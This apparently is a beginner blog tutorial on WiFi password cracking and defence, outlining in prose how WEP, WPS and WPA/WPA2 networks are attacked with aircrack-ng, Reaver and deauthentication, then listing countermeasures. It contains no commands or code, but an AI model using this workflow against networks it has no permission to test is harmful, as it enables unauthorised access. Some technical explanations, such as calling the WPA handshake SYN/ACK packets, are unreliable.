Auditing Wireless Security | Basics of WiFi Hacking & Security

I wrote this article to lay the foundation of WiFi hacking and security within you. WHY? Because using hacking tools and copying my commands won’t make you a professional hacker. You should at least know the basic concepts and details otherwise, you’ll be recognized as a script kiddie.


Encryption and different security mechanisms are used to protect wireless networks. Data transmitted over wireless network are encrypted using WEP, WPA or WPA2 encryption.

WEP stands for Wired Equivalent Privacy!
WPA stands for WiFi Protected Access!
WPS stands for WiFi Protected Setup!

Soon, you’ll be able to recover WiFi passwords for WEP, WPA, WPA2 as well as WPS using different tools such as wifite, aircrack-ng, reaver and fern WiFi cracker.

Required Resources

To successfully hack and secure any wireless network, we need follows tools and resources:

  • Kali Linux (includes Aircrack-ng kit and WIFITE).
  • WiFi Adapter (Supporting packet injection).
  • Target WiFi Network (YT video: Create Mobile Hotspot WEP, WPA, WPA2)

HARDWARE INFO: If your system has an inbuilt WiFi card that isn’t support by Kali Linux or wifite then you need to use an External WiFi adapter.

  • [easyazon_link identifier=”B002SZEOLG” locale=”US” tag=”hnorg-20″]TP-LINK TL-WN722N[/easyazon_link] (I’m using this, supported – no config. req.)
  • [easyazon_link identifier=”B0035APGP6″ locale=”US” tag=”hnorg-20″]Alfa AWUSO36NH [/easyazon_link] (supported, higher range and more powerful)

You can also attach different detachable antennas to your adapter for more range.

Time Needed

I am providing you some stats regarding “time needed to crack” and “chances of success”; these stats are correct and valid to the best of my knowledge and experience.

WEP: Less than 2 minute in most cases – 99% Chances of Success.
WPA or WPA2: Usually few seconds (weak password) to Never (strong password) – 10% Chances of Success.
WPS Enabled: Sometimes – Few seconds but in most cases (around 8-12 hours) – 50% Chances.

Factors Involved

There are few things to consider before you can begin auditing your wireless security. Following factors can greatly impact the overall process:

  • DISTANCE: The more the distance between the hacker and target, the lesser will be the signal strength. Weak Signal strength means, this process will take more (or infinite) time.
  • NETWORK TRAFFIC: Number of connected users and high amount of Data transmitted over a wireless network, speeds up the whole process. As more packets are captured.
  • WIRELESS CARD QUALITY: Poor wireless adapters (weak and low powered) decreases the overall attack speed. As the signal strength is always low, thus sufficient no. of packets aren’t captured.
  • SIGNAL INTERFERENCE: Several wireless networks around you (usually on same channels) decreases hacking speed. As signal from different WiFi’s intersect each other and thus overall signal strength degrades.

Concept | Auditing Wireless Security

Hacking WEP WiFi Password!

Getting into actual technical details (algorithm and encryption) of wireless security mechanism instead of practical is just useless right now. Let me teach you in simple and plain English.

Most tools that security professional uses for wireless auditing, internally uses aircrack-ng. There are few general steps followed in WEP wireless password cracking:

  1. Put the wireless card in monitoring mode (usually airmon-ng is used), to begin listening to all nearby WiFi networks.
  2. Select a target and start capturing its IVS packets in a file (usually airodump-ng is used) that will hopefully have password in encrypted form. This process needs active AP (Wireless Access Point)
  3. Feed the saved IVS file to aircrack-ng to crack password. Aircrack-ng uses ome analysis and bruteforcing to guess the password.

Cracking WPS WiFi Pin

WPS is an additional security feature that later turns out to be vulnerable to brute force attack.

Just like any other password cracking process this is as simple as selecting a WiFi target and testing different WPS Pin against it.

Reaver is a tool that is used to bruteforce WPS pin.

Hacking WPA and WPA2 WiFi

To hack password of WPA or WPA2 WiFi, we need handshake packets and password dictionary: Let’s learn about these terms:

Handshake: When a client tries to authenticate itself to any access point, they share few data packets of SYN and AKN (synchronization and acknowledgement). These sharing of packet from both parties is called handshake. To crack WPA or WPA2 WiFi, we try to capture these handshake packets.

Handshake stores password in hashed form that humans can’t read. Therefore, to recover the actual password from this hash, we’ll try brute forcing against it. Handshake can be easily captured in few seconds and bruteforcing is done offline.

Password dictionary file is a file that contains all words from different human dictionaries (English, German etc.) and some other sources. Majority of people, unaware of hacking and security usually chooses easy password such as words or phrases from English dictionary. These types of passwords can be easily racked using password dictionary files.

A dictionary file might contain few hundreds to billions of passwords.

Now, let me explain you the concept in simple and plain English. There are few general steps that followed in WPA2 (or WPA) wireless password cracking:

  1. Put the wireless card in monitoring mode (usually airmon-ng is used), to begin listening to all nearby WiFi networks.
  2. Select a WPA2 (or WPA) targets and start capturing handshake packets in a file (usually airodump-ng is used) that will have password in encrypted form. This process needs active AP (Wireless Access Point)
  3. At the same time, we’ll disconnect associated clients from WiFi AP (usually aireplay-ng is used). Now, they’ll try to re-authenticate themselves to Wireless AP and handshake happens. And we get a chance to capture these handshake packets.
  4. Feed the captured handshake to the aircrack-ng with a password file. Now, aircrack-ng will use this password dictionary to bruteforcing and recover the WiFi password.

Countermeasures | Protect your WiFi

You should always focus on auditing (and tightening) your own Wireless security (instead of going Jail for hacking other’s WiFi AP). Following are some tips you can implement to protect your wireless.

  • Change WiFi security from WEP to WPA or WPA2. WEP is now depreciated security protection.
  • Don’t enable WPS security option as it’s vulnerable to WPS Pin Attack. Google for WPS CVE (Common Vulnerabilities and Exposures).
  • Always choose a strong password. An alphanumeric password longer than 8 characters and with a combination of uppercase, lowercase and special symbols tends to take hundreds of years to crack.
  • Change your WiFi password periodically. If someone gets your WiFi’s password somehow, then they shouldn’t be able to enjoy it for longer.
  • Finally, try to hack your own WiFi Password (as shown in this tutorial) then understand and upgrade your WiFi security accordingly. Repeat this process and keep your security always tight.

More Resources

So you have successfully read this article? To be honest this wasn’t actually technical but you are at least prepared for WiFi Hacking and Security!

Recommended Books

Here are two popular books on Wireless Security Auditing:

Further Readings

Now you are ready to perform wireless security auditing. Please find “How to perform” details in following articles:


Here are few external links that will complement this article. Warning: They are bit technical!

You may also like...